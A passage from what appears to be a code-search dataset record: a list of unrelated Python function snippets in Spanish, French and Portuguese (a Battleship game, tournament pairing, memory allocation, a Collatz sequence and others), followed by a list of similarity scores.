:/\\n\".format(usuario))\n sleep(3)\n print(\"Mi flota esta compuesta por \\n- {} \\n- {} \\n- {}\\n Preparate para empezar\\n\".format(Portaviones.caracteristicas(Portaviones), Fragata.caracteristicas(Fragata), Submarinos.caracteristicas(Submarinos)))\n sleep(3)\n mostrar_tablero(tablero)\n while len(lista_ubicacion_barco) > 0:\n while True: #validacion para la fila ingresada por el usuario\n try:\n elegir_fila = int(input(\"Ingresa una fila: \"))\n if elegir_fila < 1 or (elegir_fila >10 and elegir_fila != 24):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha fila{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n while True: #validacion para la columna ingresada por el usuario\n try:\n elegir_columna = int(input(\"Ingresa una columna: \"))\n if elegir_columna < 1 or (elegir_columna >10):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha columna{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n tiro_elegido = (elegir_fila, elegir_columna) #cada tiro se almacena en una lista\n if tiro_elegido[0] == 24:\n print(\"Has accedido a un cheat code, los barcos estan en: \",lista_ubicacion_barco)\n elif tiro_elegido in disparos_elegidos: #si la coordenada ingresada por el usuario ya la ingreso anteriormente, quedo guardada en la lista y no le va a contar como disparo efectuadao\n print(\"Este disparo ya lo has hecho antes :|\")\n disparos_repetidos += 1 \n elif tiro_elegido in lista_ubicacion_barco:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has acertado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}F{}\".format(Fore.RED, Fore.RESET) #se remplaza la coordenada acertada por una F roja\n lista_ubicacion_barco.remove(tiro_elegido) #se quita la posicion del barco de la lista general donde estan todas las ubicaciones\n disparos_efectuados += 1\n disparos_acertados += 1\n puntaje += 10\n #se verifica si la coordenada ingresada pertenece a alguna coordenada almacenada en las listas de cada barco y se elimina\n #cuando una lista este vacia muestra un mensaje que ha hundido a la nave especificaa\n if tiro_elegido in coordenadas_portaviones: \n coordenadas_portaviones.remove(tiro_elegido) \n if len(coordenadas_portaviones) == 0:\n print(\"Felicitaciones has hundido el portaviones, su ataque aereo quedo neutralizado\\n\")\n elif tiro_elegido in coordenadas_fragata:\n coordenadas_fragata.remove(tiro_elegido)\n if len(coordenadas_fragata) == 0:\n print(\"Felicitaciones has hundido la Fragata, su comunicacion con tierra ha sido detenida\\n\")\n elif tiro_elegido in coordenadas_submarinos:\n coordenadas_submarinos.remove(tiro_elegido)\n if len(coordenadas_submarinos) == 0:\n print(\"Felicitaciones has hundido los submarinos\\n\")\n else:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has fallado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}X{}\".format(Fore.BLUE, Fore.RESET) #se remplaza la coordenada errada por una X azul\n disparos_efectuados += 1\n disparos_fallidos += 1\n puntaje -= 2\n mostrar_tablero(tablero)\n disparos_elegidos.clear()\n print(\"{}Ese disparo me ha dolido.{} Has logrado hundir toda mi flota :(\".format(Fore.RED, Fore.RESET))\n sleep(1)\n if disparos_efectuados == 9:\n print(\"¿Eres un robot? lo que acabas de hacer es poco probable... 
¿viste los cheat codes verdad?\")\n elif disparos_efectuados < 45:\n print(\"Excelente estrategia\")\n elif disparos_efectuados >= 45 and disparos_efectuados <= 70:\n print(\"Buena estrategia, pero hay que mejorar(o buscar los cheat codes)\")\n elif disparos_efectuados > 70:\n print(\"{}Considérese Perdedor, tiene que mejorar{}\".format(Fore.RED, Fore.RESET))\n print(\"\\nCargando tus estadisticas :| .......... pssss deberias probar el numero de kobe en fila\\n\")\n sleep(2.5)\n for x in usuario_partida: #usuario_partida almacena el usuario de cada partida, se borra la lista cuando se ingresa otro jugador\n print(\"{}{} tus estadisticas fueron las siguientes:{}\".format(Fore.YELLOW,x, Fore.RESET))\n print(\"Disparos realizados = {}\".format(disparos_efectuados))\n print(\"Puntaje total = {}\".format(puntaje))\n print(\"Disparos repetidos = {}\".format(disparos_repetidos))\n print(\"Tu tablero quedo asi:\")\n mostrar_tablero(tablero)\n #se agregaran los puntajes y disparos del usuario a la base de datos en el txt\n for x in usuario_partida:\n y = x\n with open(\"Basedatos.txt\", \"r\") as bd:\n punto = []\n datos = bd.readlines()\n nuevo_valor = \"\"\n for x in datos:\n if y in x:\n index = datos.index(x)\n puntos = x[:-1].split(\",\")\n if int(puntos[4]) < puntaje: #si el usuario ya tiene un puntaje se va a almacenar en el txt el que sea mayor (puede ser el viejo o el que acaba de obtener)\n puntos[4] = \" {}\".format(puntaje)\n if int(puntos[5]) > disparos_efectuados: #si el usuario ya ha jugado se va a almacenar en el txt la menor cantidad de disparos que haya obtenido \n puntos[5] = \" {}\".format(disparos_efectuados)\n for x in range(len(puntos)):\n if x != len(puntos) - 1:\n nuevo_valor += puntos[x] + \",\"\n else:\n nuevo_valor += puntos[x] + \"\\n\"\n datos[index] = nuevo_valor\n with open(\"Basedatos.txt\", \"w\") as bd: #se reescribira el txt con los datos del usuario que jugo la partida actualizados\n bd.writelines(datos)", "def select_new_current_cup(self):\n\n # \"The crab selects a new current cup: the cup which is immediately clockwise of the current cup.\"\n\n current_position = self.cups.index(self.current)\n if current_position < len(self.cups) - 1: # Current cup is not on the end of the list.\n self.current = self.cups[current_position + 1]\n else:\n self.current = self.cups[0]", "def tri_si_rencontre(self, joueurs_tries, liste_rencontres, nb_joueurs):\n # We recover the possibilities\n for x in joueurs_tries:\n liste_dict = []\n for y in joueurs_tries:\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n continue\n else:\n liste_dict.append(y)\n self.dict_possiblity[x] = liste_dict\n copy_joueurs = list(joueurs_tries)\n liste_finale = []\n nb_tour = 0\n error = False\n while joueurs_tries:\n x = joueurs_tries[0]\n for y in joueurs_tries:\n if nb_tour > nb_joueurs**2:\n print(\"Il y a une erreur dans l'algorithme.\")\n error = True\n break\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n nb_tour += 1\n continue\n else:\n i = 0\n # we are looking for a unique possibility\n for key in list(self.dict_possiblity):\n if len(self.dict_possiblity[key]) == 1:\n valeur = self.dict_possiblity[key][0]\n liste_finale.append((key, valeur))\n liste_rencontres.append((key, valeur))\n joueurs_tries.remove(key)\n joueurs_tries.remove(valeur)\n self.sup_dicti(valeur, key)\n i += 1\n break\n if i > 0:\n break\n # we remove both of the possibilities\n self.sup_dicti(x, y)\n liste_finale.append((x, y))\n 
liste_rencontres.append((x, y))\n joueurs_tries.remove(y)\n joueurs_tries.remove(x)\n break\n if error:\n liste_finale = Vue().demander_binomes(copy_joueurs,\n nb_joueurs)\n return liste_finale\n return liste_finale", "def processa_compra(self, compra):\n\n print(\"Boleto criado!\\n\" + compra.nota_fiscal)", "def present(self):", "def escolhe_iin_comp(abv): \n \n # Vai ser usado o tuplo que contem todas as informacoes sobre os diferentes tipos de cartao definido nas linhas de codigo iniciais.\n # Sao acedidas as informacoes no indice 1 (Abreviatura), 2 (Digitos iniciais IIN) e 3 (Numero de Digitos). \n \n # Iremos percorrer o tuplo com todas as informacoes sobre os tipos de cartao. Quando se chegar a informacao correspondente a entidade emissora introduzida, escolhemos aleatoriamente os digitos iniciais e o comprimento do cartao.\n \n \n for e in t_cartoes:\n \n if e[1] == abv:\n dig_in = e[2][int(random() * len(e[2]))]\n comp = int(e[3][int(random() * len(e[3]))]) \n \n return (dig_in,comp)", "def acao(self, propriedade):\n if not super(Aleatorio, self).acao(propriedade):\n # Se atende criterio aleatorio\n if random.random() > PROBABILIDADE_DE_COMPRA:\n propriedade.compra(self)", "def test_3(self):\n print(\"Consumir con cedula incorrecta\")\n billetera1=BilleteraElectronica(1,\"Maria\", \"Bra\", 20267824, 1234)\n billetera1.recargar(100, \"20/12/2017\", \"Comercio1\", 20267824)\n self.assertEqual(billetera1.saldo(), 100)\n billetera1.consumir(50, \"22/15/2017\", \"Comercio1\", 20267823, 1234)\n self.assertEqual(billetera1.saldo(), 100)", "def isFirst(self):\n return 1", "def peor_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n mayor_desperdicio = None # Posición de la partición que produce mayor\n # desperdicio.\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n if mayor_desperdicio == None:\n mayor_desperdicio = memoria.index(part)\n elif part[0] - proc[1] > memoria[mayor_desperdicio][0] - proc[1]:\n mayor_desperdicio = memoria.index(part)\n\n exito = True\n\n if exito:\n memoria[mayor_desperdicio][1] = proc[0]\n else:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def consome_ped(self):\n tempo = random.randint(1, 3)\n time.sleep(tempo)\n logging.info(\" \".join([\"Cliente\",\n str(self.nome),\n \"bebeu\"]))\n self.gerenciador.espera_beberem()", "def collatz(n):\n if n==1:\n return [n]\n \n if n>1:\n seq = [n]\n while n>1:\n n = collatz_step(n)\n seq.append(n)\n\n if seq[-1]==1:\n return seq" ]
[ "0.5769282", "0.5743955", "0.5429377", "0.53927815", "0.53786826", "0.5377348", "0.5373288", "0.5235085", "0.5226564", "0.5222602", "0.51664275", "0.5165773", "0.51485234", "0.51367635", "0.5131511", "0.5119195", "0.5055059", "0.5043993", "0.5040059", "0.5032709", "0.5030647", "0.5026771", "0.5013764", "0.5003773", "0.49852875", "0.4976012", "0.49631053", "0.4954908", "0.49519232", "0.49508563", "0.4947668", "0.4946034", "0.4938951", "0.49335504", "0.49188146", "0.49073133", "0.48935395", "0.4883605", "0.48755345", "0.48553285", "0.4852679", "0.48505452", "0.48383072", "0.4833301", "0.4828392", "0.4820314", "0.4820314", "0.48196316", "0.4811546", "0.4808415", "0.48077998", "0.48033208", "0.48025358", "0.48015025", "0.47927716", "0.47927716", "0.47881633", "0.4780583", "0.47790706", "0.47754273", "0.47707036", "0.47614545", "0.47555006", "0.4753438", "0.47506005", "0.47496158", "0.47482583", "0.47449094", "0.47430876", "0.4735606", "0.47208318", "0.47070032", "0.47061744", "0.4700492", "0.46959725", "0.4685802", "0.4685802", "0.46814716", "0.4674427", "0.4670305", "0.46695325", "0.4669437", "0.46630642", "0.4662521", "0.4661031", "0.46605605", "0.46571696", "0.46558687", "0.46557933", "0.46549007", "0.46506178", "0.46475846", "0.46470502", "0.4643487", "0.46420506", "0.4635675", "0.46295676", "0.46285632", "0.46283942", "0.4616069", "0.4615258" ]
0.0
-1
Kruskal's algorithm for finding the MST of a graph, supplied via its adjacency matrix; it uses the ring_finder function to look for rings in the graph and min_nonzero_idx to find the indices of the minimum-cost edges
import numpy as np  # used throughout but missing from the original snippet

def kruskal(m):
    # Greedy MST construction: repeatedly take the cheapest remaining edge
    # and keep it only if it does not close a ring in the partial tree.
    n = m.shape[0]
    m_ret = np.zeros([n, n], dtype=int)
    while np.count_nonzero(m_ret) != 2 * (n - 1):  # an MST stores n-1 symmetric edges
        i_min, j_min = min_nonzero_idx(m)
        n_min = m[i_min, j_min]
        m[i_min, j_min], m[j_min, i_min] = 0, 0  # consume the edge from the input
        m_ret[i_min, j_min], m_ret[j_min, i_min] = n_min, n_min
        if ring_finder(m_ret, [i_min], []):  # reject the edge if it closes a ring
            m_ret[i_min, j_min], m_ret[j_min, i_min] = 0, 0
    return m_ret
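The function above depends on two helpers, min_nonzero_idx and ring_finder, that the dump does not include. The sketch below is a plausible reconstruction under two assumptions — a symmetric adjacency matrix in which 0 means "no edge", and ring detection by depth-first search — and is not the dataset's original code:

import numpy as np

def min_nonzero_idx(m):
    # (row, col) of the smallest nonzero entry, i.e. the cheapest remaining edge.
    masked = np.where(m != 0, m, np.inf)
    return np.unravel_index(np.argmin(masked), m.shape)

def ring_finder(m, path, visited):
    # Depth-first search from the last node on `path`; reaching a node that is
    # already on the path (other than the immediate parent) closes a ring.
    node = path[-1]
    visited.append(node)
    for nxt in np.nonzero(m[node])[0]:
        nxt = int(nxt)
        if len(path) > 1 and nxt == path[-2]:
            continue  # skip the edge we just walked in on
        if nxt in path:
            return True
        if nxt not in visited and ring_finder(m, path + [nxt], visited):
            return True
    return False

With these in place, kruskal(np.array([[0, 2, 3], [2, 0, 1], [3, 1, 0]])) returns the two-edge tree that keeps the weights 1 and 2 and discards the weight-3 edge.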
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def kruskal(self):\n AGM = []\n i = j = 0\n \n self.grafo = sorted(self.grafo,key=lambda item:item[2])\n\n pai = []\n nivel = []\n\n for vertice in range(self.nVer):\n pai.append(vertice)\n nivel.append(0)\n\n while j < self.nVer-1:\n u,v,w = self.grafo[i]\n i+=1\n a = self.findSet(pai,u)\n b = self.findSet(pai,v)\n\n if a!=b:\n j+=1\n AGM.append([u,v,w])\n self.union(a,b,nivel,pai)\n resp = 0\n for u,v,w in AGM:\n resp += w\n print('%.2f' % (resp/100))", "def Kruskal(G): # la fonction prend la liste de edges et de union find\n edges = G.edges\n unionfind_list = G.nodes\n G_k = Graph() # le graph contient le graph de kruskal\n dim = len(unionfind_list) # dimension du nombre de sommet du graph\n kruskal_cost = 0 # initilisation du cout du graphe\n\n sorted_edges = deepcopy(edges)\n sorted_edges.sort() # copy et triage des aretes par cout croissant\n # pour chaque arete on recupere les deux noeuds de leur extremite\n for edge in sorted_edges:\n unionfind_a = edge.get_startnode()\n unionfind_b = edge.get_endnode()\n # s'ils ont deux racines differentes\n if unionfind_a.find() != unionfind_b.find():\n G_k.add_node(unionfind_a)\n G_k.add_node(unionfind_b)\n # on ajoute les deux noeuds et l'arete dans l'arbre de kruskal\n G_k.add_edge(edge)\n # on met a jour le cout\n kruskal_cost += edge.get_vcost()\n unionfind_a.union(unionfind_b)\n # si le nombre d'arete de l'arbre de kruskal est\n # egal au nombre de sommet-1\n # on retourne l'arbre de kruskal et son cout\n if G_k.get_nb_edges() == dim - 1:\n return kruskal_cost, G_k\n return kruskal_cost, G_k", "def find_kx(input_params, search_domain=None, show_progress=False,\r\n grid_points=20, iterations=9, reduction_factor=9,\r\n plot_full_region=True):\r\n w = input_params['w']\r\n d_list = input_params['d_list']\r\n ex_list = input_params['ex_list']\r\n ez_list = input_params['ez_list']\r\n mu_list = input_params['mu_list']\r\n N = len(mu_list)\r\n assert N == len(d_list) == len(ex_list) == len(ez_list)\r\n # error(z) approaches 0 as kx = z approaches a true plasmon mode.\r\n # It's proportional to the determinant of the boundary-condition matrix, \r\n # which equals zero at modes.\r\n def error(kx):\r\n if kx == 0:\r\n return inf\r\n temp_params = input_params.copy()\r\n temp_params['kx'] = kx\r\n should_be_zero = np.linalg.det(bc_matrix(find_kzs(temp_params)))\r\n return should_be_zero / kx**(N+1)\r\n # \"return should_be_zero\" is also OK but has an overall slope that\r\n # makes it harder to find zeros; also, there's a false-positive at k=0.\r\n \r\n # choose the region in which to search for minima. 
My heuristic is:\r\n # The upper limit of kx should be large enough that\r\n # 2 * pi * i * kzm * d ~ 20 for the thinnest layer we have, or 3 times\r\n # the light-line, whichever is bigger.\r\n if search_domain is None:\r\n kx_re_max = max(max(abs((20 / (2 * pi * d_list[i]))\r\n * cmath.sqrt(ez_list[i] / ex_list[i])) for i in range(1,N)),\r\n 3 * w / nu.c0)\r\n kx_re_min = -kx_re_max\r\n kx_im_min = 0\r\n kx_im_max = abs(kx_re_max)\r\n else:\r\n kx_re_min = search_domain[0]\r\n kx_re_max = search_domain[1]\r\n kx_im_min = search_domain[2]\r\n kx_im_max = search_domain[3]\r\n \r\n # Main part of function: Call find_all_zeros()\r\n kx_list = find_all_zeros(kx_re_min, kx_re_max, kx_im_min, kx_im_max, error,\r\n show_progress=show_progress, grid_points=grid_points,\r\n iterations=iterations,\r\n reduction_factor=reduction_factor,\r\n plot_full_region=plot_full_region)\r\n \r\n # sort and remove \"repeats\" with opposite signs\r\n kx_list = sorted(kx_list, key=(lambda kx : abs(kx)))\r\n i=0\r\n while i < len(kx_list) - 1:\r\n if abs(kx_list[i] + kx_list[i+1]) <= 1e-6 * (abs(kx_list[i]) + abs(kx_list[i+1])):\r\n kx_list.pop(i)\r\n else:\r\n i += 1\r\n \r\n # Fix amplifying waves\r\n kx_list = [(-kx if (kx.imag < 0 or (kx.imag==0 and kx.real < 0)) else kx)\r\n for kx in kx_list]\r\n \r\n return kx_list", "def kruskal(Grafo,diferencia):\n edges = list()\n #print(diferencia,\"la diferencia\" )\n for i in range(len(Grafo)): # collect the edges in G\n for v,w in Grafo[i]:\n if (w!=-1):\n edges.append((i,v,w))\n # sort the edges in ascending order w.r.t weights in the edges\n edges.sort(key=lambda x: x[2])## se organiza por peso \n ans,sans = [ list() for i in range(len(Grafo)) ],0\n df = dforest(len(Grafo))\n i = 0\n contador=0\n while i!=len(edges):\n u,v,w = edges[i]\n if df.find(u)!=df.find(v):\n df.union(u,v)\n contador+=1\n if(contador==diferencia):\n #print (w,\"pinche w\")\n return w\n\n i += 1", "def _qt_radius_clustering_minimal(self, min_to_cluster, reduced, unassigned_orphans, cache, max_cycles):\n # Separating components and removing dominated indices reduced runtime on tbpb82 0.4@100% from 10s to 10ms.\n # Before removing dominated, tree_275 0.04@100% found a solution with score 4.0485 after 228k cycles. After, found it in 49k. After adding the second Counter to CoverManager, found it under 1k cycles. 
Each cycle was substantially slower, but the solution still was found ~1000x faster (ms instead of 20 min).\n out_of_range = reduced.copy()\n out_of_range[out_of_range != 0] = 1\n neighbors_of = {}\n for ind in self._not_ignored_inds:\n clstr_inds = np.nonzero(reduced[:,ind] == 0)[0]\n neighbors_of[ind] = set(clstr_inds)\n chsn_indices = set(self.index[name] for name in self.chosen)\n avail_indices = set(self.index[name] for name in self.available)\n num_not_ignored = len(self._not_ignored_inds)\n considered_nbrs, dominated_inds = self._remove_dominated_inds(neighbors_of, chsn_indices, avail_indices, out_of_range)\n # # Process depending on the run parameters\n cache['cycles_used'] = 0\n final_centre_inds, final_scores = [], []\n if min_to_cluster == num_not_ignored: # Critical percent equivalent to 100%\n # Can dramatically speed up the search by separating components\n component_inds = self._identify_components(neighbors_of)\n subset_cycles, cycle_rollover = None, 0\n for subset_indices in component_inds:\n subset_to_cluster = len(subset_indices)\n subset_chosen = chsn_indices & subset_indices\n subset_avail = avail_indices & subset_indices\n if max_cycles != None:\n subset_cycles = ceil(subset_to_cluster/float(min_to_cluster) * max_cycles) + cycle_rollover\n subset_centre_inds, subset_scores, subset_cycles_used = self._qt_radius_cluster_subset(subset_indices, subset_chosen, subset_avail, considered_nbrs, dominated_inds, subset_to_cluster, cache, subset_cycles, out_of_range)\n if subset_cycles_used == None or subset_cycles_used >= subset_cycles:\n cycle_rollover = 0\n else:\n cycle_rollover = subset_cycles - subset_cycles_used\n final_centre_inds.extend(subset_centre_inds)\n final_scores.extend(subset_scores)\n elif min_to_cluster == num_not_ignored - len(unassigned_orphans):\n # Can still use the component speedup in this case\n orphan_inds = set(unassigned_orphans)\n component_inds = self._identify_components(neighbors_of)\n subset_cycles, cycle_rollover = None, 0\n for subset_indices in component_inds:\n if max_cycles != None:\n subset_cycles = ceil(len(subset_indices)/float(min_to_cluster) * max_cycles) + cycle_rollover\n subset_to_cluster = len(subset_indices - orphan_inds)\n if subset_to_cluster == 0: # The entire subset is orphaned, so no centers can be found\n if max_cycles != None:\n cycle_rollover += subset_cycles\n continue\n subset_chosen = chsn_indices & subset_indices\n subset_avail = avail_indices & subset_indices\n subset_centre_inds, subset_scores, subset_cycles_used = self._qt_radius_cluster_subset(subset_indices, subset_chosen, subset_avail, considered_nbrs, dominated_inds, subset_to_cluster, cache, subset_cycles, out_of_range)\n if subset_cycles_used == None or subset_cycles_used >= subset_cycles:\n cycle_rollover = 0\n else:\n cycle_rollover = subset_cycles - subset_cycles_used\n final_centre_inds.extend(subset_centre_inds)\n final_scores.extend(subset_scores)\n else:\n # Can't split into components and guarantee optimal, as I can't predict which component should be allowed to miss some variants.\n # May be a way to remove some components from consideration, but likely requires running _qt_radius_cluster_subset() multiple times. May still be faster, so worth considering if more speed is actually useful here.\n # - All unassigned orphans are part of total_allowed_missed by definition. 
So all other clusters are only allowed to miss allowed_missed = total_allowed_missed - len(unassigned_orphans).\n # - The global optimal solution for some component is guaranteed to fall between the solution for that component finding 100% of variants, and the solution for that component finding len(component)-allowed_missed variants. If they are equal, that's the global optimal solution for that component, and it can be excluded from the combined run. If they're unequal, it was a waste of time and the component has to be included in the combined run.\n final_centre_inds, final_scores, _cycles_used = self._qt_radius_cluster_subset(set(neighbors_of.keys()), chsn_indices, avail_indices, considered_nbrs, dominated_inds, min_to_cluster, cache, max_cycles, out_of_range)\n alt_variants = []\n return final_centre_inds, final_scores, alt_variants", "def minimum_spanning_arborescence(sol):", "def solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=[]):\n\n #A = adjacency matrix, u = vertex u, v = vertex v\n def weight(A, u, v):\n return A[u][v]\n\n #A = adjacency matrix, u = vertex u\n def adjacent(A, u):\n L = []\n for x in range(len(A)):\n if A[u][x] > 0 and x != u and A[u][x] != 'x':\n L.insert(0,x)\n return L\n\n #Q = min queue\n def extractMin(Q):\n q = Q[0]\n Q.remove(Q[0])\n return q\n\n #Q = min queue, V = vertex list\n def decreaseKey(Q, K):\n for i in range(len(Q)):\n for j in range(len(Q)):\n if K[Q[i]] < K[Q[j]]:\n s = Q[i]\n Q[i] = Q[j]\n Q[j] = s\n\n #V = vertex list, A = adjacency list, r = root\n def prim(V, A, r):\n u = 0\n v = 0\n\n # initialize and set each value of the array P (pi) to none\n # pi holds the parent of u, so P(v)=u means u is the parent of v\n P=[None]*len(V)\n\n # initialize and set each value of the array K (key) to some large number (simulate infinity)\n K = [999999]*len(V)\n\n # initialize the min queue and fill it with all vertices in V\n Q=[0]*len(V)\n for u in range(len(Q)):\n Q[u] = V[u]\n\n # set the key of the root to 0\n K[r] = 0\n decreaseKey(Q, K) # maintain the min queue\n\n # loop while the min queue is not empty\n while len(Q) > 0:\n u = extractMin(Q) # pop the first vertex off the min queue\n\n # loop through the vertices adjacent to u\n Adj = adjacent(A, u)\n for v in Adj:\n w = weight(A, u, v) # get the weight of the edge uv\n\n # proceed if v is in Q and the weight of uv is less than v's key\n if Q.count(v)>0 and w < K[v]:\n # set v's parent to u\n P[v] = u\n # v's key to the weight of uv\n K[v] = w\n decreaseKey(Q, K) # maintain the min queue\n return P\n\n\n # graph is a list of kingdoms that previous i is the parent of j where j = i + 1 \n graph = prim(adjacency_matrix, list_of_kingdom_names, starting_kingdom)\n\n # key = parent, value = children\n g = {}\n\n for x in range(len(list_of_kingdom_names)):\n g[x] = []\n\n for x in range(len(graph)):\n for y in range(len(graph)):\n if x == graph[y]:\n g[x].append(y) \n\n\n def path(k):\n if not g[k]:\n return [k]\n\n lst = [k]\n\n for child in g[k]:\n lst += path(child) + [k]\n # print(lst)\n\n return lst\n\n\n full_path = path(starting_kingdom)\n\n # print(full_path)\n\n\n\n # return closed_walk, conquered_kingdoms", "def _G_to_km_on_basis_single_level(self, w, m):\n kB = self._sym.kBoundedSubspace(self.k,t=1)\n g = kB.K_kschur()\n mon = self.km()\n if m < w.length():\n return 0\n ans = self.zero()\n for la in Partitions(m, max_part = self.k):\n ans += g.homogeneous_basis_noncommutative_variables_zero_Hecke((la)).coefficient(w)*mon(la)\n return ans", "def rkm(X, init_W, s, 
plot_ax=None):\n\n #extract useful info from args\n N = X.shape[0]\n d = X.shape[1]\n NC = init_W.shape[0]-2\n\n #construct boundary matrix\n boundary = init_W[[0,NC+1],:]\n B=np.zeros([NC,d],float)\n B[[0,NC-1],:]=boundary\n\n #construct regularizer hessian\n AW = np.diag(np.ones(NC))+np.diag(-0.5*np.ones(NC-1),1)+np.diag(-0.5*np.ones(NC-1),-1)\n\n #compute initial labels\n XW_dst = distance.cdist(X,init_W,'sqeuclidean')\n u = XW_dst.argmin(1)\n\n #iterate the minimizer\n converged = False\n it = 0\n while(not converged):\n it = it+1\n #print('iteration '+repr(it))\n\n #compute cardinality\n W_card=np.zeros(NC+2,int)\n for i in range(NC+2):\n W_card[i] = np.sum(u==i)\n\n #compute centroid matrix\n C = np.ndarray([NC,d],float)\n for i in range(NC):\n C[i,:] = np.sum(X[u==i+1,:],0)\n\n #construct k-means hessian \n AX = np.diag(W_card[1:NC+1])\n\n #update waypoints\n W = np.matmul(np.linalg.pinv(AX+s*AW),C+0.5*s*B)\n W = np.vstack([boundary[0,:],W,boundary[1,:]])\n\n #compute new labels\n XW_dst = distance.cdist(X,W,'sqeuclidean')\n u_new = XW_dst.argmin(1)\n\n #check for convergence\n converged = not np.sum(u_new!=u)\n u=u_new\n\n #plot\n if(plot_ax is not None):\n pyplot.sca(plot_ax)\n pyplot.ion()\n pyplot.cla()\n pyplot.title('Annealing, s='+repr(s))\n pyplot.plot(X[:,0],X[:,1],'bo')\n pyplot.plot(W[:,0],W[:,1],'-ro')\n pyplot.axis('equal')\n\n pyplot.pause(1.0/60)\n \n return W, u", "def decide_k_min(self, H0_dist, Ha_dist, rnd_index):\r\n\r\n self.H0_dists.append(copy.deepcopy(H0_dist))\r\n self.Ha_dists.append(copy.deepcopy(Ha_dist))\r\n #print(\"Deciding kmin for round index\", rnd_index)\r\n\r\n # If you change the end bound to len(H0_dist) then that's an issue\r\n\r\n for k in range(self.round_sched[rnd_index] // 2 + 1, self.round_sched[rnd_index] + 1):\r\n #print(\"kmin?:\", k)\r\n LR_num = 0\r\n LR_denom = 0\r\n for i in range(k, len(H0_dist)):\r\n LR_num += Ha_dist[i]\r\n LR_denom += H0_dist[i]\r\n \r\n delta = 1\r\n\r\n # FOR METIS\r\n #if (LR_num + self.pr_Ha_sched[max(rnd_index-1, 0)])/ (LR_denom + self.pr_H0_sched[max(rnd_index-1, 0)])> 1 / self.alpha:\r\n\r\n # FOR ATHENA\r\n if LR_num / LR_denom > 1 / self.alpha and Ha_dist[k] > delta * H0_dist[k]:\r\n \r\n # The case of equality essentially only happens when both sides are 0. Then there's no harm\r\n # in calling it a kmin (since it necessarily won't contribute to the risk), in spite of the fact\r\n # that the ratio criterion cannot be satisfied because of division by zero.\r\n # GRANT COULD ALSO BE DENOM = 0 OR ALPHA NUM > DENOM short circuit\r\n\r\n\r\n\r\n # SENTINELS FOR WHEN THERE'S NO KMIN! 
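(Note: as written, the loop below can also finish without any k passing the test, in which case nothing is recorded for this round and the function falls through, returning None.)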
if we get to the\r\n # end of the dist and there's no satisfaction just return SENTINEL\r\n\r\n # FOR MINERVA\r\n #if self.alpha * LR_num >= LR_denom:\r\n\r\n self.k_min_sched[rnd_index] = k\r\n\r\n cumulative_H0_sched = self.pr_H0_sched[max(rnd_index-1, 0)]\r\n cumulative_Ha_sched = self.pr_Ha_sched[max(rnd_index-1, 0)]\r\n\r\n self.pr_H0_sched[rnd_index] = LR_denom + cumulative_H0_sched\r\n self.pr_Ha_sched[rnd_index] = LR_num + cumulative_Ha_sched\r\n\r\n # FOR MINERVA\r\n self.risk_sched[rnd_index] = LR_denom / LR_num\r\n\r\n # FOR METIS\r\n #self.risk_sched[rnd_index] = self.pr_H0_sched[rnd_index] / self.pr_Ha_sched[rnd_index]\r\n return", "def kto_wygral():\n for x in range(0, ROZMIAR_PLANSZY):\n for y in range(0, ROZMIAR_PLANSZY):\n for kierunek in (\"poziom\", \"pion\", \"skos prawy\", \"skos lewy\"):\n iksy, kolka = sprawdz_linie((x, y), kierunek)\n if iksy == ile_do_wygranej:\n return X\n if kolka == ile_do_wygranej:\n return O\n return False", "def dpsearch(points,k):\n\t#M = k\n\tpoints = np.sort(points,axis=0)\n\tL = len(points)\n\tM = k\n\tT = list(np.zeros(M+1,dtype='int'))\n\tT[0] = 0\t#first threshold is by default always set to index 0 in trellis graph.\n\tT[M] = L \t#last threshold is by default always set to last number in input points.\n\ttrellis_value = np.full((M+1,L+1),np.inf)\n\ttrellis_backpointer = np.full((M+1,L+1),np.inf)\n\n\t# Stage 1: m=1\t\n\tfor l in range(1,L-M+2):\n\t\ttrellis_value[1][l] = ((l-0)/float(L))*np.var(points[0:l])\n\t\ttrellis_backpointer[1][l] = 0\n\n\t\n\tif(M>2):\n\t\t# Stage 2: m=2 to m=M-1\n\t\tfor m in range(2,M):\n\t\t\tfor l in range(m,L-M+m+1):\n\t\t\t\t#finding optimal path\n\t\t\t\tJ_min = np.inf\n\t\t\t\tJ_temp = np.inf\n\t\t\t\tfor i in range(m-1,l):\n\t\t\t\t\tJ_temp = trellis_value[m-1][i] + ((l-i)/float(L))*np.var(points[i:l])\n\t\t\t\t\tif J_temp < J_min:\n\t\t\t\t\t\tJ_min = J_temp\n\t\t\t\t\t\tptr = i\n\t\t\t\t\n\t\t\t\ttrellis_value[m][l],trellis_backpointer[m][l] = J_min,ptr\n\t\t\t\t\n\n\t# Stage 3: m=M\n\tm = M\n\tl = L\n\t#finding optimal path\n\tJ_min = np.inf\n\tJ_temp = np.inf\n\tfor i in range(m-1,l):\n\t\tJ_temp = trellis_value[m-1][i] + ((l-i)/float(L))*np.var(points[i:l])\n\t\tif J_temp < J_min:\n\t\t\tJ_min = J_temp\n\t\t\tptr = i\n\n\t\n\ttrellis_value[M][L] = J_min\n\ttrellis_backpointer[M][L] = ptr\n\t\n\t\n\t# Backtracking\n\tl = L\n\tm = M\n\twhile m>=2:\n\t\tT[m-1] = int(trellis_backpointer[m][l])\n\t\tl = int(trellis_backpointer[m][l])\n\t\tm = m - 1\n\n\t#Assign cluster labels\n\tlabels = np.full(len(points),0)\n\tj = T[0]\n\tcounter = 0\n\tfor i in range(1,k+1):\n\t\tlabels[j:T[i]] = counter\n\t\tj = T[i]\n\t\tcounter += 1\n\n\n\treturn labels,T", "def findminpath(tab, gxtab, gytab, pixtab):\n\n pathdist = 2 # the number of points each points on a ray can related to on the previous ray\n pathdist_penalty = 